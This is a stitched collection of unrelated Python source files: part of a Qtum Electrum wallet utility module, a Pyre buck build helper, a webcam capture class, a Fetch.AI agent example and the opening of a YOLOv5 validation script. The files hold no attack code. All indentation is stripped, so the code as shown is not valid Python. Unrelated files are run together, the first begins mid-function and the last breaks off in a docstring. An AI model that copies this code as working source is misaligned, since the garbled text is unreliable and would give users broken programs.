objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
verbosity_filter = 'd'
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
verbosity = '*'
def set_verbosity(b):
global verbosity
verbosity = b
def print_error(*args):
if not verbosity: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def get_func_name(args):
arg_names_from_sig = inspect.getfullargspec(func).args
# prepend class name if there is one (and if we can find it)
if len(arg_names_from_sig) > 0 and len(args) > 0 \
and arg_names_from_sig[0] in ('self', 'cls', 'klass'):
classname = args[0].__class__.__name__
else:
classname = ''
name = '{}.{}'.format(classname, func.__name__) if classname else func.__name__
return name
def do_profile(args, kw_args):
name = get_func_name(args)
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", name, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.qtum.qtum_electrum'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/qtum_electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_datadir_available(config_path):
path = config_path
if os.path.exists(path):
return
else:
raise FileNotFoundError(
'Electrum datadir does not exist. Was it deleted while running?' + '\n' +
'Should be at {}'.format(path))
def assert_file_in_datadir_available(path, config_path):
if os.path.exists(path):
return
else:
assert_datadir_available(config_path)
raise FileNotFoundError(
'Cannot find file but datadir is there.' + '\n' +
'Should be at {}'.format(path))
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".qtum-electrum")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Qtum-Electrum")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Qtum-Electrum")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
DECIMAL_POINT = localeconv()['decimal_point']
def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
if precision is None:
precision = decimal_point
decimal_format = ".0" + str(precision) if precision > 0 else ""
if is_diff:
decimal_format = '+' + decimal_format
result = ("{:" + decimal_format + "f}").format(x / pow (10, decimal_point)).rstrip('0')
integer_part, fract_part = result.split(".")
dp = DECIMAL_POINT
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
FEERATE_PRECISION = 1 # num fractional decimal places for sat/byte fee rates
_feerate_quanta = Decimal(10) ** (-FEERATE_PRECISION)
def format_fee_satoshis(fee, num_zeros=0):
return format_satoshis(fee, num_zeros, 0, precision=FEERATE_PRECISION)
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
try:
return datetime.fromtimestamp(timestamp)
except:
return None
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
def block_explorer_info():
from . import constants
from .qtum import testnet_block_explorers, mainnet_block_explorers
if constants.net.TESTNET:
return testnet_block_explorers
else:
return mainnet_block_explorers
def block_explorer(config):
bbb = config.get('block_explorer', 'explorer.qtum.org')
return bbb
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, params):
"""
:param config:
:type params: dict
:return: str
"""
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
if params.get('token'):
if 'qtum.org' in be_tuple[0]:
return "{}/token/{}?a={}".format(be_tuple[0], params.get('token'), params.get('addr'))
url_parts = [be_tuple[0], ]
for k, v in params.items():
kind_str = be_tuple[1].get(k)
if not kind_str:
continue
url_parts.append(kind_str)
url_parts.append(v)
return "/".join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise Exception("Not a qtum address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'qtum':
raise Exception("Not a qtum URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise Exception("Invalid qtum address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='qtum', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import errno
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
# print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r', encoding='utf-8') as f:
d = validater(json.loads(f.read()))
load_meta(d)
# backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, file_name):
try:
with open(file_name, 'w+', encoding='utf-8') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
def open_browser(url, new=0, autoraise=True):
return webbrowser.open(url, new, autoraise)
def make_dir(path, allow_symlink=True):
"""Make directory if it does not yet exist."""
if not os.path.exists(path):
if not allow_symlink and os.path.islink(path):
raise Exception('Dangling link: ' + path)
os.mkdir(path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
TxMinedStatus = NamedTuple("TxMinedStatus", [("height", int),
("conf", int),
("timestamp", int),
("header_hash", str)])
VerifiedTxInfo = NamedTuple("VerifiedTxInfo", [("height", int),
("timestamp", int),
("txpos", int),
("header_hash", str)])
def print_frames(depth=10):
print("--------------------")
for i in range(1, depth):
try:
frame = sys._getframe(i)
print(frame.f_code.co_name, frame.f_code.co_filename, frame.f_lineno)
except ValueError:
return
def make_aiohttp_session(proxy):
if proxy:
connector = SocksConnector(
socks_ver=SocksVer.SOCKS5 if proxy['mode'] == 'socks5' else SocksVer.SOCKS4,
host=proxy['host'],
port=int(proxy['port']),
username=proxy.get('user', None),
password=proxy.get('password', None),
rdns=True
)
return aiohttp.ClientSession(headers={'User-Agent' : 'Qtum Electrum'}, timeout=aiohttp.ClientTimeout(total=10), connector=connector)
else:
return aiohttp.ClientSession(headers={'User-Agent' : 'Qtum Electrum'}, timeout=aiohttp.ClientTimeout(total=10))
|
buck.py
|
# Copyright 2004-present Facebook. All rights reserved.
# pyre-unsafe
import functools
import glob
import json
import logging
import os
import subprocess
import sys
import tempfile
import threading
from collections import namedtuple
from json.decoder import JSONDecodeError
from typing import Dict, Iterable, List, Optional, Set, Tuple, cast # noqa
from .filesystem import BuckBuilder, find_root
LOG = logging.getLogger(__name__)
CACHE_PATH = ".pyre/buckcache.json"
BuckOut = namedtuple("BuckOut", "source_directories targets_not_found")
class BuckException(Exception):
pass
class FastBuckBuilder(BuckBuilder):
def __init__(
self,
buck_root: str,
output_directory: Optional[str] = None,
buck_builder_binary: Optional[str] = None,
buck_builder_target: Optional[str] = None,
debug_mode=False,
) -> None:
self._buck_root = buck_root
self._output_directory = output_directory or tempfile.mkdtemp(
prefix="pyre_tmp_"
)
self._buck_builder_binary = buck_builder_binary
self._buck_builder_target = buck_builder_target
self._debug_mode = debug_mode
self.conflicting_files = []
self.unsupported_files = []
def _get_builder_executable(self) -> str:
builder_binary = self._buck_builder_binary
if not self._debug_mode:
if builder_binary is None:
raise BuckException(
"--buck-builder-binary must be provided "
"if --buck-builder-debug is not enabled."
)
return builder_binary
target = self._buck_builder_target
if target is None:
raise BuckException(
"--buck-builder-target must be provided "
"if --buck-builder-debug is enabled."
)
binary_relative_path = (
subprocess.check_output(
[
"buck",
"build",
"--show-output",
"//tools/pyre/facebook/fb_buck_project_builder",
],
stderr=subprocess.DEVNULL,
)
.decode()
.strip()
.split(" ")[1]
)
return os.path.join(self._buck_root, binary_relative_path)
def build(self, targets: Iterable[str]) -> List[str]:
command = [
self._get_builder_executable(),
"-J-Djava.net.preferIPv6Addresses=true",
"-J-Djava.net.preferIPv6Stack=true",
"--buck_root",
self._buck_root,
"--output_directory",
self._output_directory,
] + list(targets)
if self._debug_mode:
command.append("--debug")
with subprocess.Popen(
command, stdout=subprocess.PIPE, stderr=subprocess.PIPE
) as buck_builder_process:
# Java's logging conflicts with Python's logging, we capture the
# logs and re-log them with python's logger.
log_processor = threading.Thread(
target=self._read_stderr, args=(buck_builder_process.stderr,)
)
log_processor.daemon = True
log_processor.start()
return_code = buck_builder_process.wait()
# Wait until all stderr have been printed.
log_processor.join()
if return_code == 0:
LOG.info("Finished building targets.")
if self._debug_mode:
debug_output = json.loads(
"".join([line.decode() for line in buck_builder_process.stdout])
)
self.conflicting_files += debug_output["conflictingFiles"]
self.unsupported_files += debug_output["unsupportedFiles"]
return [self._output_directory]
else:
raise BuckException(
"Could not build targets. Check the paths or run `buck clean`."
)
def _read_stderr(self, stream: Iterable[bytes]) -> None:
for line in stream:
line = line.decode().rstrip()
if line.startswith("INFO: "):
LOG.info(line[6:])
elif line.startswith("WARNING: "):
LOG.warning(line[9:])
elif line.startswith("ERROR: "):
LOG.error(line[7:])
elif line.startswith("[WARNING:"):
# Filter away thrift warnings.
pass
else:
LOG.error(line)
class SimpleBuckBuilder(BuckBuilder):
def __init__(self, build: bool = True) -> None:
self._build = build
def build(self, targets: Iterable[str]) -> Iterable[str]:
"""
Shell out to buck to build the targets, then yield the paths to the
link trees.
"""
return generate_source_directories(targets, build=self._build)
def presumed_target_root(target):
root_index = target.find("//")
if root_index != -1:
target = target[root_index + 2 :]
target = target.replace("/...", "")
target = target.split(":")[0]
return target
# Expects the targets to be already normalized.
def _find_built_source_directories(
targets_to_destinations: Iterable[Tuple[str, str]]
) -> BuckOut:
targets_not_found = []
source_directories = []
buck_root = find_buck_root(os.getcwd())
if buck_root is None:
raise Exception("No .buckconfig found in ancestors of the current directory.")
directories = set()
for target, destination in targets_to_destinations:
directories.add((target, os.path.dirname(destination)))
for target, directory in directories:
target_name = target.split(":")[1]
discovered_source_directories = glob.glob(
os.path.join(buck_root, directory, "{}#*link-tree".format(target_name))
)
if len(discovered_source_directories) == 0:
targets_not_found.append(target)
source_directories.extend(
[
tree
for tree in discovered_source_directories
if not tree.endswith(
(
"-vs_debugger#link-tree",
"-interp#link-tree",
"-ipython#link-tree",
)
)
]
)
return BuckOut(set(source_directories), set(targets_not_found))
def _normalize(targets: List[str]) -> List[Tuple[str, str]]:
LOG.info(
"Normalizing target%s `%s`",
"s:" if len(targets) > 1 else "",
"`, `".join(targets),
)
try:
command = (
["buck", "targets", "--show-output"]
+ targets
+ ["--type", "python_binary", "python_test"]
)
targets_to_destinations = (
subprocess.check_output(command, stderr=subprocess.PIPE, timeout=600)
.decode()
.strip()
.split("\n")
) # type: List[str]
targets_to_destinations = list(filter(bool, targets_to_destinations))
# The output is of the form //target //corresponding.par
result = []
for target in targets_to_destinations:
pair = target.split(" ")
if len(pair) != 2:
pass
else:
result.append((pair[0], pair[1]))
if not result:
LOG.warning(
"Provided targets do not contain any binary or unittest targets."
)
return []
else:
LOG.info(
"Found %d buck target%s.", len(result), "s" if len(result) > 1 else ""
)
return result
except subprocess.TimeoutExpired as error:
LOG.error("Buck output so far: %s", error.stderr.decode().strip())
raise BuckException(
"Seems like `{}` is hanging.\n "
"Try running `buck clean` before trying again.".format(
# pyre-fixme: command not always defined
" ".join(command[:-1])
)
)
except subprocess.CalledProcessError as error:
LOG.error("Buck returned error: %s" % error.stderr.decode().strip())
raise BuckException(
"Could not normalize targets. Check the paths or run `buck clean`."
)
def _build_targets(targets: List[str], original_targets: List[str]) -> None:
LOG.info(
"Building target%s `%s`",
"s:" if len(original_targets) > 1 else "",
"`, `".join(original_targets),
)
command = ["buck", "build"] + targets
try:
subprocess.check_output(command, stderr=subprocess.PIPE)
LOG.warning("Finished building targets.")
except subprocess.CalledProcessError as error:
# The output can be overwhelming, hence print only the last 20 lines.
lines = error.stderr.decode().splitlines()
LOG.error("Buck returned error: %s" % "\n".join(lines[-20:]))
raise BuckException(
"Could not build targets. Check the paths or run `buck clean`."
)
def _map_normalized_targets_to_original(
unbuilt_targets: Iterable[str], original_targets: Iterable[str]
) -> List[str]:
mapped_targets = set()
for target in unbuilt_targets:
# Each original target is either a `/...` glob or a proper target.
# If it's a glob, we're looking for the glob to be a prefix of the unbuilt
# target. Otherwise, we care about exact matches.
name = None
for original in original_targets:
if original.endswith("/..."):
if target.startswith(original[:-4]):
name = original
else:
if target == original:
name = original
# No original target matched, fallback to normalized.
if name is None:
name = target
mapped_targets.add(name)
return list(mapped_targets)
@functools.lru_cache()
def find_buck_root(path: str) -> Optional[str]:
return find_root(path, ".buckconfig")
def resolve_relative_paths(paths: List[str]) -> Dict[str, str]:
"""
Query buck to obtain a mapping from each absolute path to the relative
location in the analysis directory.
"""
buck_root = find_buck_root(os.getcwd())
if buck_root is None:
LOG.error(
"Buck root couldn't be found. Returning empty analysis directory mapping."
)
return {}
command = [
"buck",
"query",
"--json",
"--output-attribute",
".*",
"owner(%s)",
*paths,
]
try:
output = json.loads(
subprocess.check_output(command, timeout=30, stderr=subprocess.DEVNULL)
.decode()
.strip()
)
except (
subprocess.TimeoutExpired,
subprocess.CalledProcessError,
JSONDecodeError,
) as error:
raise BuckException("Querying buck for relative paths failed: {}".format(error))
# TODO(T40580762) we should use the owner name to determine which files are a
# part of the pyre project
results = {}
for path in paths:
# For each path, search for the target that owns it.
for owner in output.values():
prefix = os.path.join(buck_root, owner["buck.base_path"]) + os.sep
if not path.startswith(prefix):
continue
suffix = path[len(prefix) :]
if suffix not in owner["srcs"]:
continue
if "buck.base_module" in owner:
base_path = os.path.join(*owner["buck.base_module"].split("."))
else:
base_path = owner["buck.base_path"]
results[path] = os.path.join(base_path, owner["srcs"][suffix])
break # move on to next path
return results
def generate_source_directories(
original_targets: Iterable[str], build: bool
) -> Set[str]:
original_targets = list(original_targets)
targets_to_destinations = _normalize(original_targets)
targets = [pair[0] for pair in targets_to_destinations]
if build:
_build_targets(targets, original_targets)
buck_out = _find_built_source_directories(targets_to_destinations)
source_directories = buck_out.source_directories
if buck_out.targets_not_found:
if not build:
# Build all targets to ensure buck doesn't remove some link trees as we go.
_build_targets(targets, original_targets)
buck_out = _find_built_source_directories(targets_to_destinations)
source_directories = buck_out.source_directories
if buck_out.targets_not_found:
message_targets = _map_normalized_targets_to_original(
buck_out.targets_not_found, original_targets
)
raise BuckException(
"Could not find link trees for:\n `{}`.\n "
"See `{} --help` for more information.".format(
" \n".join(message_targets), sys.argv[0]
)
)
return source_directories
|
webcam.py
|
"""Raspberry Pi Face Recognition Treasure Box
Webcam OpenCV Camera Capture Device
Copyright 2013 Tony DiCola
Webcam device capture class using OpenCV. This class allows you to capture a
single image from the webcam, as if it were a snapshot camera.
This isn't used by the treasure box code out of the box, but is useful to have
if running the code on a PC where only a webcam is available. The interface is
the same as the picam.py capture class so it can be used in the box.py code
without any changes.
"""
import threading
import time
import cv2
# Rate at which the webcam will be polled for new images.
CAPTURE_HZ = 30.0
class OpenCVCapture(object):
def __init__(self, device_id=0):
"""Create an OpenCV capture object associated with the provided webcam
device ID.
"""
# Open the camera.
self._camera = cv2.VideoCapture(device_id)
# self._camera.set(3,160)
#self._camera.set(4,120)
if not self._camera.isOpened():
self._camera.open()
# Start a thread to continuously capture frames.
# This must be done because different layers of buffering in the webcam
# and OS drivers will cause you to retrieve old frames if they aren't
# continuously read.
self._capture_frame = None
# Use a lock to prevent access concurrent access to the camera.
self._capture_lock = threading.Lock()
self._capture_thread = threading.Thread(target=self._grab_frames)
self._capture_thread.daemon = True
self._capture_thread.start()
def _grab_frames(self):
while True:
retval, frame = self._camera.read()
with self._capture_lock:
self._capture_frame = None
if retval:
self._capture_frame = frame
time.sleep(1.0 / CAPTURE_HZ)
def read(self):
"""Read a single frame from the camera and return the data as an OpenCV
image (which is a numpy array).
"""
frame = None
with self._capture_lock:
frame = self._capture_frame
# If there are problems, keep retrying until an image can be read.
while frame is None:
time.sleep(0)
with self._capture_lock:
frame = self._capture_frame
# Return the capture image data.
return frame
def stop(self):
print '{"status":"Terminating..."}'
|
programmatic_aea.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This scripts contains code from agent-vs-aea.md file."""
import os
import time
from threading import Thread
from aea.aea_builder import AEABuilder
from aea.configurations.base import SkillConfig
from aea.connections.stub.connection import write_with_lock
from aea.crypto.cosmos import CosmosCrypto
from aea.crypto.helpers import COSMOS_PRIVATE_KEY_FILE, create_private_key
from aea.skills.base import Skill
ROOT_DIR = "./"
INPUT_FILE = "input_file"
OUTPUT_FILE = "output_file"
def run():
# Create a private key
create_private_key(CosmosCrypto.identifier, COSMOS_PRIVATE_KEY_FILE)
# Ensure the input and output files do not exist initially
if os.path.isfile(INPUT_FILE):
os.remove(INPUT_FILE)
if os.path.isfile(OUTPUT_FILE):
os.remove(OUTPUT_FILE)
# Instantiate the builder and build the AEA
# By default, the default protocol, error skill and stub connection are added
builder = AEABuilder()
builder.set_name("my_aea")
builder.add_private_key(CosmosCrypto.identifier, COSMOS_PRIVATE_KEY_FILE)
# Add the echo skill (assuming it is present in the local directory 'packages')
builder.add_skill("./packages/fetchai/skills/echo")
# create skill and handler manually
from aea.protocols.base import Message
from aea.protocols.default.message import DefaultMessage
from aea.skills.base import Handler
class DummyHandler(Handler):
"""Dummy handler to handle messages."""
SUPPORTED_PROTOCOL = DefaultMessage.protocol_id
def setup(self) -> None:
"""Noop setup."""
def teardown(self) -> None:
"""Noop teardown."""
def handle(self, message: Message) -> None:
"""Handle incoming message."""
self.context.logger.info("You got a message: {}".format(str(message)))
config = SkillConfig(name="test_skill", author="fetchai")
skill = Skill(configuration=config)
dummy_handler = DummyHandler(
name="dummy_handler", skill_context=skill.skill_context
)
skill.handlers.update({dummy_handler.name: dummy_handler})
builder.add_component_instance(skill)
# Create our AEA
my_aea = builder.build()
# Set the AEA running in a different thread
try:
t = Thread(target=my_aea.start)
t.start()
# Wait for everything to start up
time.sleep(4)
# Create a message inside an envelope and get the stub connection to pass it on to the echo skill
message_text = b"my_aea,other_agent,fetchai/default:0.4.0,\x08\x01\x12\x011*\x07\n\x05hello,"
with open(INPUT_FILE, "wb") as f:
write_with_lock(f, message_text)
print(b"input message: " + message_text)
# Wait for the envelope to get processed
time.sleep(4)
# Read the output envelope generated by the echo skill
with open(OUTPUT_FILE, "rb") as f:
print(b"output message: " + f.readline())
finally:
# Shut down the AEA
my_aea.stop()
t.join()
t = None
if __name__ == "__main__":
run()
|
val.py
|
# YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Validate a trained YOLOv5 model accuracy on a custom dataset
Usage:
$ python path/to/val.py --data coco128.yaml --weights yolov5s.pt --img 640
"""
import argparse
import json
import os
import sys
from pathlib import Path
from threading import Thread
import numpy as np
import torch
from tqdm import tqdm
FILE = Path(__file__).resolve()
sys.path.append(FILE.parents[0].as_posix()) # add yolov5/ to path
from yolov5_master.models.experimental import attempt_load
from yolov5_master.utils.datasets import create_dataloader
from yolov5_master.utils.general import coco80_to_coco91_class, check_dataset, check_img_size, check_requirements, \
check_suffix, check_yaml, box_iou, non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, \
increment_path, colorstr
from yolov5_master.utils.metrics import ap_per_class, ConfusionMatrix
from yolov5_master.utils.plots import plot_images, output_to_target, plot_study_txt
from yolov5_master.utils.torch_utils import select_device, time_sync
from yolov5_master.utils.callbacks import Callbacks
def save_one_txt(predn, save_conf, shape, file):
# Save one txt result
gn = torch.tensor(shape)[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(file, 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
def save_one_json(predn, jdict, path, class_map):
# Save one JSON result {"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(predn.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': class_map[int(p[5])],
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
def process_batch(detections, labels, iouv):
"""
Return correct predictions matrix. Both sets of boxes are in (x1, y1, x2, y2) format.
Arguments:
